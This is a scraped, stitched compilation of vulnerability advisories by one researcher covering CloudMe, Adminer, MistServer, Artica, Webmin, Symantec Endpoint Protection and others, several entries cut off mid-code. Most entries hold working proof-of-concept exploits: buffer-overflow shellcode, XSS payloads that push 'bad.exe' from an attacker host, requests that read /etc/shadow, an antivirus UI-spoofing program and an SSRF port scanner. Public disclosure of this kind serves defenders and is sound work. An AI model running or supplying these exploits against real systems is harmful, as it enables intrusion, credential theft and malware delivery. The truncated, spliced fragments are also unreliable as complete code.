High Disclosure Timeline: = Vendor Notification: February 9, 2018 Vendor acknowledgement: February 9, 2018 Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : February 12, 2018 www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily unavailable." : February 13, 2018 February 14, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2018-6892 CloudMe Sync <= v1.10.9 Unauthenticated Remote Buffer Overflow (hyp3rlinx / apparition security)
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt [+] ISR: Apparition Security [+] SSD Beyond Security Submission: https://blogs.securiteam.com/index.php/archives/3669 Vendor: = www.cloudme.com Product: === CloudMe Sync <= v1.10.9 (CloudMe_1109.exe) hash: 0e83351dbf86562a70d1999df7674aa0 CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software. It features a blue folder that appears on all devices with the same content, all files are synchronized between devices. Vulnerability Type: === Buffer Overflow CVE Reference: == CVE-2018-6892 Security Issue: Unauthenticated remote attackers that can connect to the "CloudMe Sync" client application listening on port , can send a malicious payload causing a Buffer Overflow condition. This will result in an attacker controlling the programs execution flow and allowing arbitrary code execution on the victims PC. CloudMe Sync client creates a socket listening on TCP Port (0x22B8) In Qt5Core: 00564DF1 . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8 00564DF9 . 890424 MOV DWORD PTR SS:[ESP],EAX 00564DFC . FF15 B8738100 CALL DWORD PTR DS:[<_ZN10QTc>; Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst C:\>netstat -ano | findstr TCP0.0.0.0: 0.0.0.0:0 LISTENING 15504 TCP[::]: [::]:0 LISTENING 15504 Buffer Overflow: EIP register will be overwritten at about 1075 bytes. EAX 0001 ECX 76F698DA msvcrt.76F698DA EDX 0035 EBX 41414141 ESP 0028D470 EBP 41414141 ESI 41414141 EDI 41414141 EIP 41414141 Stack Dump: == (508.524): Access violation - code c005 (first/second chance not available) *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - eax= ebx= ecx=41414141 edx=778f353d esi= edi= eip=41414141 esp=00091474 ebp=00091494 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? Exploitation is very easy as ASLR SafeSEH are all set to false making the exploit portable and able to work across different operating systems. We will therefore use Structured Exceptional Handler overwrite for our exploit. e.g. 6FE6909D 0x6fe6909d : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll) 00476795 0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe) 61E7B7F6 0x61e7b7f6 : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll) 0day Exploit POC: == import socket,struct print 'CloudMe Sync v1.10.9' print 'Unauthenticated Remote Buffer Overflow 0day' print 'Discovery/credits: hyp3rlinx' print 'apparition security\n' #shellcode to pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") ip=raw_input('[+] CloudMe Target IP> ') nseh="\xEB\x06"+"\x90"*2#JMP seh=struct.pack('
Oracle JDeveloper IDE Directory Traversal CVE-2017-10273 (hyp3rlinx / apparition security)
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt [+] ISR: apparition security Vendor: = www.oracle.com Product: === JDeveloper IDE Oracle JDeveloper is a free integrated development environment that simplifies the development of Java-based applications addressing every step of the application lifecycle. Vulnerability Type: === Directory Traversal CVE Reference: == CVE-2017-10273 Security Issue: Attackers can place malicious files outside intended target directories if tricked into importing corrupt .WAR or .EAR archives. Later, attackers can potentially request these scripts/files to execute system commands on affected target. Affected versions: 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0 References: http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html Exploit/POC: = 1) create evil .WAR or .EAR archive containing ../ in path name to initiate directory traversal and inside a script to execute system commands. 2) import into JDeveloper 3) files get moved outside target directories to one of the attackers choosing. 4) attacker requests the malicious file contained in target directory. BAM! Network Access: === Local Severity: = Low Disclosure Timeline: = Vendor Notification: October 14, 2016 Vendor fixes as part of CPU January 16, 2018 January 17, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Adminer <= v4.3.1 Server Side Request Forgery
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt [+] ISR: apparition security Vendor: == www.adminer.org Product: Adminer <= v4.3.1 Adminer (formerly phpMinAdmin) is a full-featured database management tool written in PHP. Conversely to phpMyAdmin, it consist of a single file ready to deploy to the target server. Adminer is available for MySQL, PostgreSQL, SQLite, MS SQL, Oracle, Firebird, SimpleDB, Elasticsearch and MongoDB. https://github.com/vrana/adminer/releases/ Vulnerability Type: === Server Side Request Forgery CVE Reference: == N/A Security Issue: Adminer allows unauthenticated connections to be initiated to arbitrary systems/ports. This vulnerability can be used to potentially bypass firewalls to identify internal hosts and perform port scanning of other servers for reconnaissance purposes. Funny thing is Adminer throttles invalid login attempts but allows endless unauthorized HTTP connections to other systems as long as your not trying to authenticate to Adminer itself. Situations where Adminer can talk to a server that we are not allowed to (ACL) and where we can talk to the server hosting Adminer, it can do recon for us. Recently in LAN I was firewalled off from a server, however another server running Adminer I can talk to. Also, that Adminer server can talk to the target. Since Adminer suffers from Server-Side Request Forgery, I can scan for open ports and gather information from that firewalled off protected server. This allowed me to not only bypass the ACL but also hide from the threat detection system (IDS) monitoring east west connections. However, sysadmins who check the logs on the server hosting Adminer application will see our port scans. root@lamp log/apache2# cat other_vhosts_access.log localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:25:11 +] "GET ///?server=TARGET-IP:21= HTTP/1.1" 403 1429 "-" "-" localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:24 +] "GET ///?server=TARGET-IP:22= HTTP/1.1" 403 6019 "-" "-" localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:56 +] "GET ///?server=TARGET-IP:23= HTTP/1.1" 403 6021 "-" "-" Details: == By comparing different failed error responses from Adminer when making SSRF bogus connections, I figured out which ports are open/closed. Port open ==> Lost connection to MySQL server at 'reading initial communication packet Port open ==> MySQL server has gone away Port open ==> Bad file descriptor Port closed ==> Can't connect to MySQL server on ''; Port closed ==> No connection could be made because the target machine actively refused it Port closed ==> A connection attempt failed. This worked so well for me I wrote a quick port scanner 'PortMiner' as a proof of concept that leverages Adminer SSRF vulnerability. PortMiner observations: == No response 'read operation timed out' means the port is possibly open or filtered and should be given a closer look if possible. This seems to occur when scanning Web server ports like 80, 443. However, when we get error responses like the ones above from the server we can be fairly certain a port is either open/closed. Quick POC: echo -e 'HTTP/1.1 200 OK\r\n\r\n' | nc -l -p Use range - Exploit/POC: = import socket,re,ssl,warnings,subprocess,time from platform import system as system_name from os import system as system_call #Adminer Server Side Request Forgery #PortMiner Scanner Tool #by John Page (hyp3rlinx) #ISR: ApparitionSec #hyp3rlinx.altervista.org #= #D1rty0Tis says hi. #timeout MAX_TIME=32 #ports to log port_lst=[] #Web server response often times out but usually means ports open. false_pos_ports=['80','443'] BANNER=''' _ __ __ _ | _ \ | | | \/ (_) | |__) |__ _ __| |_| \ / |_ _ __ ___ _ __ | ___/ _ \| '__| __| |\/| | | '_ \ / _ \ '__| | | | (_) | | | |_| | | | | | | | __/ | |_| \___/|_| \__|_| |_|_|_| |_|\___|_| ''' def info(): print "\nPortMiner depends on Error messages to determine open/closed ports." print "Read operations reported 'timed out' may be open/filtered.\n" def greet(): print 'Adminer Unauthenticated SSRF Port Scanner Tool' print 'Targets Adminer used for MySQL administration\n' print 'by hyp3rlinx - apparition security' print '
CVE-2017-16884 Mist Server v2.12 Unauthenticated Persistent XSS (hyp3rlinx / ApparitionSec)
[+] Credits: John Page (aka Hyp3rlinX) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt [+] ISR: ApparitionSec Vendor: = mistserver.org Product: === MistServer v2.12 MistServer is a full-featured, next-generation streaming media toolkit for OTT (internet streaming). Vulnerability Type: === Unauthenticated Persistent XSS CVE Reference: == CVE-2017-16884 Security Issue: Unauthenticated remote attackers can inject persistent XSS payloads by making failed HTTP authentication requests. Attacker supplied payloads will get stored in the server logs as failed authentication requests alerts. Mistserver echoes back the unsanitized payloads in Mist Servers Web interface automatically due to automatic refresh of the UI every few seconds, thereby, executing arbitrary attacker supplied code. References: https://news.mistserver.org/news/78/Stable+release+2.13+now+available%21 Exploit/POC: = import requests #INJECT IFRAME requests.get('http://VICTIM-IP:4242/admin/api?callback=={"authorize":{"password":"666","username":;http://ATTACKER-IP\'>"}}') #PUSH MALWARE requests.get('http://VICTIM-IP:4242/admin/api?callback=={"authorize":{"password":"666","username":;http://ATTACKER-IP/bad.exe\'>"}}') #EXFIL LOGS requests.get('http://VICTIM-IP:4242/admin/api?command={"authorize":{"password":"666","username":;alert(document.body.innerHTML)"}}') Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: October 19, 2017 Vendor Acknowledgement : October 20, 2017 Vendor Released Fix : November 30, 2017 December 1, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-17055 Artica Web Proxy v3.06 Remote Code Execution (hyp3rlinx / ApparitionSec)
[+] Credits: John Page (aka Hyp3rlinX) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt [+] ISR: ApparitionSec Vendor: === www.articatech.com Product: = Artica Web Proxy v.3.06.112216 Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and Control solution, usually the preserve of large companies. ARTICA PROXY Solutions have been developed over the past 10 years as an Open Source Project to help SMEs and public bodies protect both their organizations and employees from risks posed by the Internet. Vulnerability Type: === Remote Code Execution CVE Reference: == CVE-2017-17055 Security Issue: Artica offers a web based command line emulator 'system.terminal.php' (shell), allowing authenticated users to execute OS commands as root. However, artica fails to sanitize the following HTTP request parameter $_GET["username-form-id"] used in 'freeradius.users.php'. Therefore, authenticated users who click an attacker supplied link or visit a malicious webpage, can result in execution of attacker supplied Javascript code. Which is then used to execute unauthorized Operating System Commands (RCE) on the affected Artica Web Proxy Server abusing the system.terminal.php functionality. Result is attacker takeover of the artica server. Exploit/POC: = 1) Steal artica Server "/etc/shadow" password file. https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E 2) Write file 'PWN' to /tmp dir. https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: November 28, 2017 Vendor Confirms Vulnerability : November 28, 2017 Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017 December 1, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Abyss Web Server < v2.11.6 Memory Heap Corruption (hyp3rlinx / apparitionsec)
[+] Credits: John Page (aka HyP3rlinX) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ABYSS-WEB-SERVER-MEMORY-HEAP-CORRUPTION.txt [+] ISR: ApparitionSec Vendor: == aprelium.com Product: === Abyss Web Server < v2.11.6 Vulnerability Type: === Memory Heap Corruption CVE Reference: == N/A Security Issue: Possible to corrupt heap memory of the Abyss Web Server by sending specially crafted HTML in repeated HTTP POST requests. Users should upgrade to latest version v2.11.6. GetUrlPageData2 (WinHttp) failed: 12002. FAULTING_IP: msvcrt!memcpy+5a 75e49b60 f3a5rep movs dword ptr es:[edi],dword ptr [esi] EXCEPTION_RECORD: -- (.exr 0x) ExceptionAddress: 75e49b60 (msvcrt!memcpy+0x005a) ExceptionCode: c005 (Access violation) ExceptionFlags: NumberParameters: 2 Parameter[0]: Parameter[1]: 003b9000 Attempt to read from address 003b9000 CONTEXT: -- (.cxr 0x0;r) eax= ebx=075c33f8 ecx=000efd46 edx=0002 esi=075c33b8 edi=0651edb0 eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246 ntdll!ZwGetContextThread+0x12: 77670c52 83c404 add esp,4 PROCESS_NAME: abyssws.exe ERROR_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. EXCEPTION_PARAMETER1: EXCEPTION_PARAMETER2: 003b9000 READ_ADDRESS: 003b9000 FOLLOWUP_IP: abyssws+413d9 004413d9 59 pop ecx NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 APP: abyssws.exe ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) x86fre LAST_CONTROL_TRANSFER: from 0043f840 to 75e49b60 FAULTING_THREAD: BUGCHECK_STR: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE PRIMARY_PROBLEM_CLASS: ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE DEFAULT_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE STACK_TEXT: 777542a8 776cd9bc ntdll!RtlFreeHeap+0x64 777542ac 75e498cd msvcrt!free+0xcd 777542b0 004413d9 abyssws+0x413d9 777542b4 004089d0 abyssws+0x89d0 777542b8 0040a607 abyssws+0xa607 777542bc 0040bd58 abyssws+0xbd58 777542c0 0040cb5b abyssws+0xcb5b SYMBOL_STACK_INDEX: 2 SYMBOL_NAME: abyssws+413d9 FOLLOWUP_NAME: MachineOwner MODULE_NAME: abyssws IMAGE_NAME: abyssws.exe DEBUG_FLR_IMAGE_TIMESTAMP: 5807a3cb STACK_COMMAND: dps 777542a8 ; kb FAILURE_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE_c005_abyssws.exe!Unknown BUCKET_ID: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE_abyssws+413d9 ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: um:actionable_heap_corruption_heap_failure_block_not_busy_probablyexploitable_c005_abyssws.exe!unknown FAILURE_ID_HASH: {0ba3122b-4351-5a85-a0ea-294a6ce77042} Followup: MachineOwner - /// The stored exception information can be accessed via .ecxr. (2740.30b8): Access violation - code c005 (first/second chance not available) eax= ebx=075c33f8 ecx=000efd46 edx=0002 esi=075c33b8 edi=0651edb0 eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246 ntdll!ZwGetContextThread+0x12: 77670c52 83c404 add esp,4 0:011> !load winext/msec 0:011> !exploitable !exploitable 1.6.0.0 Exploitability Classification: PROBABLY_EXPLOITABLE Recommended Bug Title: Probably Exploitable - Read Access Violation on Block Data Move starting at msvcrt!memcpy+0x0250 (Hash=0xb1db8cd3.0x508907b2) This is a read access violation in a block data move, and is therefore classified as probably exploitable. ? References: https://aprelium.com/news/abws2-11-6.html Exploit/POC: = Cause Heap Corruption in Abyss Server. //Abyss Web Server Memory (heap) Corruption POC //Discover by hyp3rlinx //Error code: 0xc374 is STATUS_HEAP_CORRUPTION //0xc374 - heap has been corrupted. //=== window.onerror=function(){ return true } var target='<a rel="nofollow" href="http://VICTIM-IP:/hosts/host@0/edit/ipcontrol">http://VICTIM-IP:/hosts/host@0/edit/ipcontrol</a>'; function mk_iframe_targets(f){ var tmp = document.createElement('IFRAME') tmp.style='display:none' tmp.name='hidden-frame'+f return tmp } function mk_inputs(id,na
Symantec Endpoint Protection (SEP) v12.1 Tamper-protection Bypass CVE-2017-6331 (hyp3rlinx)
[+] Credits: John Page a.k.a hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt [+] ISR: ApparitionSec Vendor: === www.symantec.com Product: === Symantec Endpoint Protection v12.1.6 (12.1 RU6 MP5) Symantec 12.1.7004.6500 Vulnerability Type: === Tamper-Protection Bypass Denial Of Service / Message Spoof CVE Reference: == CVE-2017-6331 SSG16-041 Security Issue: Symantec Endpoint Protection (SEP), does not validate where WinAPI messages comes from (lack of UIPI). Therefore, malware can easily spoof messages to the UI or send WM_SYSCOMMAND to close the SEP UI denying end user ability to scan / run the EP AntiVirus protection. Spoofed messages could also potentially inform a user a scan was clean. Unfortunately Symantecs advisory left out details of the Denial Of Service as well as minimizing the amount of text a malware could inject into the UI which would result in compromising the integrity of the Symantec Endpoint Protection Control Panel user interface. References: === https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20171106_00 Exploit/POC: = 1) Compile below C program, it targets various components of SEP, comment out what you want to send to the UI. 2) Try to open the Symantec Endpoint UI and you will be denied. 3) Or inject attacker supplied messages intructing the user the file is clean etc. #include #include #define VICTIM "DevViewer.exe" //By HYP3RLINX //ISR: ApparitionSec //Symantec EP Protection - Tamper Protection Bypass Vulnerability //Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004 Symantec 12.1.7004.6500 Windows 7 //How: FindWindow / SendMessage Win32 API //Impact: DOS / Integrity Compromised //TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans. void main(void){ while(1){ HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection")); if(hWnd!=NULL){ //This injects arbitrary messages to SEP UI. SetWindowText(hWnd, "*** Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. ***"); //This prevents a user from being able to run AV scans and renders SEP UI useless //SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0); } //HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0); HWND x = FindWindow(NULL, TEXT("DevViewer")); if(x!=NULL){ SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0); } HWND x2 = FindWindow(NULL, TEXT("DoScan Help")); SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0); HWND x3 = FindWindow(NULL, TEXT("Sylink Drop")); SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0); HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016")); if(x!=NULL){ SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0); } sleep(1); } } Network Access: === Local Severity: = Medium Disclosure Timeline: = Vendor Notification: July 8, 2016 Vendor acknowledged: 7/14/16 Vendor advisory : November 6, 2017 November 10, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Webmin v1.850 Remote Code Execution (hyp3rlinx / apparitionsec)
[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3430 [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WEBMIN-v1.850-REMOTE-COMMAND-EXECUTION.txt [+] ISR: ApparitionSec Vulnerability summary The following advisory describes three (3) vulnerabilities found in Webmin version 1.850 Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from the console or remotely. See the standard modules page for a list of all the functions built into Webmin. The vulnerabilities found are: XSS vulnerability that leads to Remote Code Execution CSRF Schedule arbitrary commands Server Side Request Forgery Credit An independent security researcher, hyp3rlinx, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program Vendor response The vendor has released patches to address these vulnerabilities. For more information: https://github.com/webmin/webmin/commit/0c58892732ee7610a7abba5507614366d382c9c9 and http://www.webmin.com/security.html Vulnerability details XSS vulnerability that leads to Remote Code Execution Under Webmin menu Others/File Manager there is option to download a file from a remote server Download from remote URL. By setting up a malicious server we can wait for file download request then send a XSS payload that will lead to Remote Code Execution. Webmin echo back the File Download request status which we can trigger the XSS vulnerability and bypass this Referrer check by setting the domain=webmin-victim-ip. Proof of Concept import socket #=== #Run this script and listen for file download from webmin #Enter payload to execute RCE #wait for webmin to connect and download file #Vulnerability is in Menu/Others/File Manager #issue is webmin echoes back status of the download #by injecting XSS we bypass the Referer: check by assign #domain to victims own IP, then execute our RCE #--- #e.g. #Download from remote URL #http://x.x.x.x:1/shell/index.cgi #> whoami #root PORT=int(raw_input("[PORT]> ")) #port we listen on for file download requests WEBMIN_IP=raw_input("[Webmin IP]> ") #victim #Read /etc/shadow file CMD=("/>document.domain='<a rel="nofollow" href="http://"+WEBMIN_IP+":1/shell/index.cgi">http://"+WEBMIN_IP+":1/shell/index.cgi</a>'"+ ""+ "document.forms[0].submit()") s = socket.socket() HOST = '' s.bind((HOST, PORT)) s.listen(5) print '\nwebmin file download 0day...' while True: conn, addr = s.accept() conn.send(CMD+'\r\n') print 'Connected!' print s.recv(1024) conn.close() s.close() CSRF Schedule arbitrary commands User controlled input is not sufficiently sanitized, by sending GET request to create_job.cgi with the following parameter dir=/=ls an attacker to execute arbitrary commands. Proof of Concept http://x.x.x.x:1/at/create_job.cgi?user=root=31=7=2017=2=00=/=ls -lt=0 Server Side Request Forgery User controlled input is not sufficiently sanitized, by sending GET request to tunnel/link.cgi/http://VICTIM-IP:8000 an attacker can trigger the vulnerability Proof of Concept http://x.x.x.x:1/tunnel/link.cgi/http://VICTIM-IP:8000 Network Access: === Remote Severity: = High Disclosure Timeline: Would like to acknowledge Beyond Securitys SSD program for the help with co-ordination of this vulnerability. More details can be found on their blog at: https://blogs.securiteam.com/index.php/archives/3430 [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized NT Domain / PHP Information Disclosures CVE-2017-14085 (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt [+] ISR: ApparitionSec Vendor: == www.trendmicro.com Product: === OfficeScan v11.0 and XG (12.0)* Vulnerability Type: === Unauthorized NT Domain Disclosure Unauthorized PHP Information Disclosure OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. CVE Reference: == CVE-2017-14085 Security Issue(s): ( NT Domain Disclosure ) Remote unauthenticated attackers who reach the TrendMicro OfficeScan XG application can query the networks NT domains. NT enumeration is leaked by the web interface when it should not do so. Usually, you use NET commands so while this NT enumeration is not high in severity, it should not return this information and especially to unauthorized users as it can aid in launching further attacks. ( PHP Information Disclosure ) Remote unauthenticated attackers that can connect to TrendMicro OfficeScan XG application can query the PHP version and modules. In 'analyzeWF.php" we see get_loaded_extensions() and phpversion() calls, but session or authentication check is made. $strAnalyzeResultHeader .= analyzeWFShowItemInfo('Current PHP version: '.phpversion()); $strAnalyzeResultHeader .= analyzeWFShowItemInfo('PHP extensions: '.implode(', ',get_loaded_extensions())); $strAnalyzeResultHeader .= analyzeWFShowItemInfo('WGF version : '.$strVersion); etc... References: === https://success.trendmicro.com/solution/1118372 Exploit/POC (NT Domain Disclosure): = [root@localhost /]# curl -v -k https://VICTIM-IP:4343/officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe * About to connect() to VICTIM-IP port 4343 * Trying VICTIM-IP... connected < HTTP/1.1 200 OK < Pragma: no-cache < Content-Type: text/plain;charset=utf-8 < Server: Microsoft-IIS/7.5 < X-Powered-By: ASP.NET < Date: Thu, 01 Jun 2017 15:27:27 GMT < Connection: close < Content-Length: 510 { "ERROR" : { "ERROR_CODE" : 0 }, "RESPONSE" : { "NODES" : [ { "NAME" : "Avaya" }, { "NAME" : "Km-netprinters" }, { "NAME" : "Mshome" }, { "NAME" : "Printserver" }, { "NAME" : "MyDomain" }, { "NAME" : "Workgroup" }, { "NAME" : "Xpemb" } ] } } Exploit / POC (PHP Information Disclosure): c:\> curl -k https://VICTIM-IP:4343/officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php HTTP/1.1 200 OK [INI_UPDATE_SECTION] >>>> Start Anaylze WGF : 2017-06-02 15:58:26 [INFO] Current PHP version: 7.0.6 [INFO] PHP extensions: Core, bcmath, calendar, ctype, date, filter, hash, 